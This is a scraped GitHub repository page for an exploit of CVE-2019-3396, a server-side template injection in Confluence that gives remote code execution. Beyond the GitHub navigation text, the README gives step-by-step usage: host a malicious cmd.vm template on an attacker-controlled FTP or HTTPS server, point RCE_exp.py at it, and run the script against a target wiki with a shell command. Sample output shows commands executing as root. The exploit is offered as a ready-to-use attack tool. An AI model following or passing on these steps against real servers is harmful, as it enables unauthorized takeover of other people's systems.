CVE-2019-3396_EXP

CVE-2019-3396 confluence SSTI RCE

1、put the cmd.vm on your website (must use ftp or https ,http doesn't work )
2、modify RCE_exp.py ，change the filename = 'ftp://1.1.1.1/cmd.vm' （python -m pyftpdlib -p 21）
3、python REC_exp.py http://test.wiki_test.cc:8080 "whoami"

$ python REC_exp.py http://test.wiki_test.cc:8080 "id"
uid=0(root) gid=0(root) groups=0(root)

Name		Name	Last commit message	Last commit date
Latest commit History 7 Commits
RCE_exp.py		RCE_exp.py
README.md		README.md
cmd.vm		cmd.vm

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

RCE_exp.py

RCE_exp.py

README.md

README.md

cmd.vm

cmd.vm

Repository files navigation

CVE-2019-3396_EXP

About

Releases

Packages

Languages

Yt1g3r/CVE-2019-3396_EXP

Folders and files

Latest commit

History

Repository files navigation

CVE-2019-3396_EXP

About

Topics

Resources

Stars

Watchers

Forks

Languages